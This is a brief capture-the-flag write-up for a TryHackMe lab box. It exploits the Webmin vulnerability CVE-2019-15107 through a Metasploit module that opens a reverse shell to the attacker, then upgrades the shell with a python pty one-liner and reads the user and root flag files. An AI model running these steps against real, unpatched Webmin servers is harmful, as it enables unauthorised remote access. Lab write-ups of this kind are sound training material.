TryHackMe | Source
Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool.
Introduction
An easy but still nice challenge. The challenge is built on CVE-2019-15107, which is a pretty serious issue.
Scanning
Running Nmap gave the following output:

Right, we have SSH running on port 22 and Webmin httpd on port 10000. Let's hop into the browser to check what's on the web server.

Note that the website is served over SSL (Secure Sockets Layer), so the link is https://10.10.x.x:10000

Exploitation
msfconsole

search webmin

use 7
options

set RHOSTS 10.10.x.x
set LHOST your_vpn_ip
Make sure to set SSL to true (because the server is using SSL):
set ssl true
With all the parameters set, we are good to go and run the payload. Type run or exploit.

Simply type the following command to get a stable shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'

Flags
cat /home/dark/user.txt
cat /root/root.txt
Thank you for reading